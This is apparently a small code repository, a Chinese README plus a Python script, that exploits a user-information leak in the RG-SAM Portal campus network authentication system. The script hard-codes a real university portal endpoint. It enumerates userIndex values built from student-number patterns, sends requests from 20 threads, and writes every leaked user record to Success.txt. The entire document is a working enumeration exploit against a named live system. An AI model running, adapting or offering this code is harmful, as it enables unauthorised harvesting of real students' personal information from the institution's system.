├── README.md
└── getInfo.py


/README.md:
--------------------------------------------------------------------------------
 1 | # ePortalGetPass
 2 | 
 3 | 漏洞地址：http://admintony.com/校园网认证系统-RG-SAM-Portal组件-用户信息泄露漏洞.html
 4 | 
 5 | 用法：
 6 |   在设置区设置线程数量及需要爆破的接入方式标识符
 7 | ```python
 8 |     """
 9 |         =======================设置区===========================
10 |     """
11 | 
12 |     # 线程数量
13 |     threadNum = 20
14 |     # 接入方式标识符
15 |     #ident = "02e342e31365f353132303" #PC+网线直连
16 |     #ident = "62e3230302e3138335f353132303" #PC+WIFI
17 |     ident = "62e35322e3233355f353132303" #安卓+WIFI
18 | 
19 |     """
20 |         =====================设置区结束==========================
21 |     """
22 |   ```
23 | 


--------------------------------------------------------------------------------
/getInfo.py:
--------------------------------------------------------------------------------
 1 | import requests,random,time,os,threading
 2 | 
 3 | class GetInfo(object):
 4 |     def __init__(self,userIndex):
 5 |         self.url = "http://portal.swust.edu.cn/eportal/InterFace.do?method=getOnlineUserInfo"
 6 |         self.userIndex = userIndex
 7 |         self.headers={"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36"}
 8 | 
 9 |     def getinfo(self):
10 |         res = requests.post(self.url,headers=self.headers,data={"userIndex":self.userIndex})
11 |         res.encoding="utf-8"
12 |         return res.text
13 | 
14 | def userIndexGen(ident):
15 |     prefix = "30613532373163316135396430313232616631323931386332323865396334315f31302e313"
16 |     list = [x for x in range(10)]
17 | 
18 |     # 入学年份 从 14 - 17 年,也可以改成15 - 17年  因为14年的很多都不在学校了。
19 |     for i in range(5,8):
20 |         # 学号第一位
21 |         for j in list:
22 |             # 学号第2位
23 |             for k in list:
24 |                 # 学号第3位
25 |                 for p in list:
26 |                     # 学号第4位
27 |                     for z in list:
28 |                         userIndex = prefix+ident+"13"+str(i)+"3"+str(j)+"3"+str(k)+"3"+str(p)+"3"+str(z)
29 |                         yield userIndex
30 | 
31 | def run(gen):
32 |     while True:
33 |         try:
34 |             userIndex = gen.__next__()
35 |         except:
36 |             break
37 |         info = GetInfo(userIndex)
38 |         infom = info.getinfo()
39 |         print("[+] 正在尝试",userIndex)
40 |         #print(infom)
41 |         if "获取用户信息失败" not in infom:
42 |             print("[+] 获取用户信息成功")
43 |             print(infom)
44 |             with open("Success.txt","a",encoding="utf-8") as file:
45 |                 file.write(infom+"\n")
46 |         time.sleep(random.random())
47 | 
48 | def test(userIndex):
49 |     info = GetInfo(userIndex)
50 |     print(info.getinfo())
51 | 
52 | if __name__ == '__main__':
53 |     """
54 |         =======================设置区===========================
55 |     """
56 | 
57 |     # 线程数量
58 |     threadNum = 20
59 |     # 接入方式标识符
60 |     #ident = "02e342e31365f353132303" #PC+网线直连
61 |     ident = "62e3230302e3138335f353132303" #PC+WIFI
62 |     #ident = "62e35322e3233355f353132303" #安卓+WIFI
63 |     #ident = "62e3133362e385f353132303"   #苹果+WIFI
64 | 
65 |     """
66 |         =====================设置区结束==========================
67 |     """
68 |     userIndex = userIndexGen(ident)
69 |     #print(userIndex.__next__())
70 |     threads = []
71 |     for i in range(threadNum):
72 |         thread = threading.Thread(target=run,args=(userIndex,))
73 |         thread.start()
74 |         threads.append(thread)
75 | 
76 |     for thread in threads:
77 |         thread.join()
78 | 
79 |     print()
80 |     print("[+] 已经爬取完成，结果保存在Success.txt")
81 | 


--------------------------------------------------------------------------------